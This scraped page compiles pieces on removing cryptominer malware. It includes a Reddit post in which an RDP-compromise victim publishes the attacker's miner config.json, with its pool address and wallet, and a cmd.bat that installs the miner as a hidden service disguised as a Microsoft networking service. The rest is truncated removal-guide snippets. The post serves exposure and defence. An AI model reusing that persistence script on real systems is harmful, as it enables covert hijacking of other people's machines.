Virus CoinMiner entfernen - so geht's - CHIP

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero [link] [comments]

How to Find and Remove a Hidden Miner Virus on Your PC 🐛🛡️🖥️ How to diagnose and remove a bitcoin miner trojan - YouTube Vírus minerando bitcoins no meu computador! How to Remove BitcoinMiner Remove bitcoin miner trojan Virus (Virus Removal Guide ...

Eine Krypto-Miner-Malware befällt Ihren PC oder andere Geräte wie ein gewöhnlicher Virus, beginnt dann aber damit, Ihr Gerät zum Berechnen einer digitalen Währung zu nutzen. Um etwa Bitcoins ... Symptoms Of The Bitcoin Miner Virus. Some of the symptoms of a Bitcoin Miner Virus include: System overheating; GPU and CPU over-usage; Crucial system slow down; Sustained mining as this can break the system’s hardware; How The Miner Malware Spreads. Due to diverse methods, the Bitcoin Miner Malware can be spread to other places like email attachments and in websites that have been ... Der CoinMiner-Virus missbraucht die Rechenleistung Ihres Computers, damit der Inhaber des Virus Geld mit aufwendigen Berechnungen verdient. Wie das Prinzip des BitCoin Mining genau funktioniert, erfahren Sie in diesem Praxistipp. Laden Sie sich das kostenlose Programm Malwarebytes Anti-Malware bei CHIP herunter und installieren Sie es. Hierbei handelt es sich um einen äußerst zuverlässigen ... BitCoin miner virus or BitCoin mining virus is a dangerous malware that may use your CPU and/or GPU to obtain BitCoin cryptocurrency by mining illegally. Cryptocurrency miners keep hitting computers and trying to use their resources to generate revenue for their developers. Even though this type of infection is called BitCoinMiner, it does mine for digital currencies such as Monero ... Der BitCoin Miner-Virus oder der BitCoin Mining-Virus ist eine gefährliche Malware, die möglicherweise Ihre CPU und / oder GPU verwendet, um die BitCoin-Kryptowährung durch illegales Mining abzurufen. Cryptocurrency Miner greifen immer wieder auf Computer zu und versuchen, mit ihren Ressourcen Einnahmen für ihre Entwickler zu generieren. Obwohl diese Art der Infektion BitCoinMiner heißt ...

[index] [3971] [32665] [42069] [24405] [46405] [22510] [18013] [21707] [7028] [39438]

How to Find and Remove a Hidden Miner Virus on Your PC 🐛🛡️🖥️

Olá! Notei uma lentidão no computador, provocada por um vírus que estava minerando Bitcoins no meu computador. Nesse vídeo você acompanha como resolvi o problema. Produção e Edição: Eu ... BitcoinMiner is a Malware that was designed to force your computer to mine crypto-currency that is called Bitcoin. When the Bitcoins have been mined on the computer’s system, the designer of this... This video is simply some unedited footage that I was preparing to show how malware that masquerades as a Realtek Audio Driver sits and uses system resources to mine Bitcoin for the malware author. 👍 Watch how to remove a hidden Bitcoin mining virus from your computer. If you noticed that your computer – while you’re not using it - still behaves as if i... Remove bitcoin miner trojan Virus (Virus Removal Guide) Visit Site :- https://www.uninstallallpcvirus.com/remove-bitcoin-miner-trojan-virus-virus-removal-gui...

#